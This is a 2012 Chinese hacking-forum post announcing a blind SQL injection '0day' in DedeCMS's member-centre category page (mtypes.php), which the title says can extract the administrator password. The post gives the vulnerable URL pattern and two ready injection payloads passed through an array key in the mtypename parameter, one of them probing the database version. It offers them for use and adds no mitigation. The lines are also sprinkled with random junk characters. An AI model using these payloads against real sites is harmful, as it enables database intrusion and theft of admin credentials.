找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2274|回复: 0
打印 上一主题 下一主题

DedeCMS会员中心分类管理SQL注射0day漏洞可获得管理员密码

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-20 08:08:09 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
需要magic_quotes_gpc = Off,所以说是鸡肋啊.5 l# w$ Q$ R( e$ v* _! S+ R

. \/ V' H6 i# n. S6 J
! _" C3 j" ?/ Q8 N, M发生在数组key里的注射漏洞,有点意思.
4 @3 `# `9 O1 R! `* i9 N7 L* Z ! o- K2 `5 K- v5 I+ [  b7 c
这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下# `+ G! ^, \* ?( A
; M) J5 ]/ p1 [) N
http://www.xxx.com /dede/member/mtypes.php?dopost=save
& [& e( L0 V" P* J+ Q+ m2 K$ t
1 R3 e. t, P( C! ~6 `. B- g5 \exploit:
3 S0 Q$ i% S2 u( A  p. U5 Kmtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r
% z5 L2 M- o  ^: @; D7 Q8 Jmtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r
( X1 s5 K+ {0 L- `6 `
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表